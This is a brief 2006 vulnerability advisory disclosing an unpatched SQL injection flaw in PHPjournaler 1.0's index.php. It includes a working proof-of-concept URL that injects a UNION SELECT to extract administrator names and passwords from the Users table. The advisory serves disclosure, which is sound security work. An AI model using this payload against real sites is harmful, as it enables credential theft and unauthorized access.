SQL Injection Vulnerability in PHPjournaler

Summary

Vulnerability: SQL Injection Vulnerability in PHPjournaler
Discovered: 2006.01.01
Last Update: 0 n/a
ID: EV0009
CVE: CVE-2006-0066
Risk Level: medium
Type: SQL Injection
Status: Unpatched
Vendor: n/a
Vulnerable Software: PHPjournaler (http://phpjournaler.sourceforge.net/)
Version: 1.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in PHPjournaler (http://phpjournaler.sourceforge.net/) script.

Vulnerable scripts: index.php

Variable $readold isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Administrator's password is threatened.

PoC/Exploit

Show Administrator's password:
http://host/phpjournaler/index.php? readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/*

Solution.

Solution for "SQL Injection Vulnerability in PHPjournaler" is not available. Check vendor's website for updates.